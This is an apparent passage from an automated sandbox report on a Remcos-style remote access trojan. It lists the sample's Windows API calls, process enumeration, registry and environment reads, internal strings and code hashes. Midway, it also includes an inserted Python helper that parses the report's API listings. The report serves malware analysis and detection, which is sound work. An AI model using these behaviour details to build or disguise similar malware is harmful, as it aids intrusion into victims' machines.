                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValue
                                                                                            • String ID: pth_unenc$BG
                                                                                            • API String ID: 1818849710-2233081382
                                                                                            • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                            • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                            • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                            • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                            • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                            • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                            • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                            • SetEvent.KERNEL32(0000026C), ref: 00404AF9
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                            • String ID: KeepAlive | Disabled
                                                                                            • API String ID: 2993684571-305739064
                                                                                            • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                            • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                            • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                            • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                            APIs
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                            • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                            • String ID: Alarm triggered
                                                                                            • API String ID: 614609389-2816303416
                                                                                            • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                            • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                            • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                            • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                            Strings
                                                                                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                            • API String ID: 3024135584-2418719853
                                                                                            • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                            • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                            • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                            • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                            • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                            • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                            • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                            APIs
                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                              • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                              • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                              • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 2180151492-0
                                                                                            • Opcode ID: 8ed805619018687b8c3253cfdac70904094ea72a7bd7bf631ac512d0263f82af
                                                                                            • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                            • Opcode Fuzzy Hash: 8ed805619018687b8c3253cfdac70904094ea72a7bd7bf631ac512d0263f82af
                                                                                            • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                            • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                            • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                            • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                            • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                            • __freea.LIBCMT ref: 0044FFC4
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                            • String ID:
                                                                                            • API String ID: 313313983-0
                                                                                            • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                            • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                            • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                            • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                            • _free.LIBCMT ref: 0044E1A0
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 336800556-0
                                                                                            • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                            • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                            • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                            • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                            • _free.LIBCMT ref: 100071B8
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 336800556-0
                                                                                            • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                            • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                            • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                            • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                                            • _free.LIBCMT ref: 00446F7D
                                                                                            • _free.LIBCMT ref: 00446FA4
                                                                                            • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                                            • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free
                                                                                            • String ID:
                                                                                            • API String ID: 3170660625-0
                                                                                            • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                            • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                            • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                            • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                            • _free.LIBCMT ref: 10005BB4
                                                                                            • _free.LIBCMT ref: 10005BDB
                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free
                                                                                            • String ID:
                                                                                            • API String ID: 3170660625-0
                                                                                            • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                            • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                            • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                            • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                            • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CloseHandleOpen$FileImageName
                                                                                            • String ID:
                                                                                            • API String ID: 2951400881-0
                                                                                            • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                            • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                            • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                            • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
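The function at 0041B395 above opens a process twice (first with access mask 00001000, then 00000400) and passes the handle to GetProcessImageFileNameW, which is how code reads another process's image path; both masks are rights that GetProcessImageFileNameW accepts. Reading such masks by eye across a long report is error-prone, so the following added Python helper (not part of the Joe Sandbox report or its tooling) parses the bullets of an "APIs" block into structured calls, decodes OpenProcess access masks using the fixed winnt.h values, and returns the ordered call sequence with or without the "Part of subcall function" rows. The two sample inputs are constructed from bullets shown on this page; the only bullet shapes it recognises are the three that appear here, and anything else is skipped.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One Joe Sandbox "APIs" bullet. Three shapes occur in this report:
#   "Api.MODULE(args), ref: ADDR"
#   "Api.MODULE ref: ADDR"                      (no argument list recovered)
#   "Part of subcall function PARENT: Api.MODULE(args), ref: ADDR"
_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Process access rights as defined in winnt.h (fixed by the Win32 ABI).
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00100000: "SYNCHRONIZE",
}

# Constructed samples: bullets copied from two APIs blocks on this page.
SAMPLE_OPENPROCESS = """\
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
"""
SAMPLE_SUBCALL = """\
• GetEnvironmentStringsW.KERNEL32 ref: 0044E144
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• _free.LIBCMT ref: 0044E1A0
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw hex strings; "?" means the value was not recovered
    ref: str                 # address of the call site
    parent: Optional[str] = None   # set only for "Part of subcall function" rows


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the bullets of one function's APIs block; unrecognised lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref").upper(), m.group("parent")))
    return calls


def decode_process_access(mask: int) -> List[str]:
    """Expand an OpenProcess dwDesiredAccess mask into named rights, lowest bit first."""
    names = [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS)   # bits not in the table (e.g. standard rights)
    if leftover:
        names.append(f"UNKNOWN_0x{leftover:X}")
    return names


def open_process_rights(calls: List[ApiCall]) -> List[Tuple[str, List[str]]]:
    """(call-site, rights) for every OpenProcess whose access mask was recovered."""
    out = []
    for c in calls:
        if c.api != "OpenProcess" or not c.args or c.args[0] == "?":
            continue
        out.append((c.ref, decode_process_access(int(c.args[0], 16))))
    return out


def call_sequence(calls: List[ApiCall], include_subcalls: bool = False) -> List[str]:
    """Ordered API names; subcall rows are dropped unless requested."""
    return [c.api for c in calls if include_subcalls or c.parent is None]


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_OPENPROCESS)
    print(call_sequence(calls))
    for ref, rights in open_process_rights(calls):
        print(ref, "|".join(rights))
```

Run on the first sample, the helper reports PROCESS_QUERY_LIMITED_INFORMATION at 0041B395 and PROCESS_QUERY_INFORMATION at 0041B3A8; when a mask carries bits outside the table, those bits are kept as an UNKNOWN_0x... entry rather than silently dropped, so a mask such as 0x1FFFFF is not misreported as a plain query.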
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                            • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                            • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$lstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 493641738-0
                                                                                            • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                            • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                            • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                            • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 0044F7B5
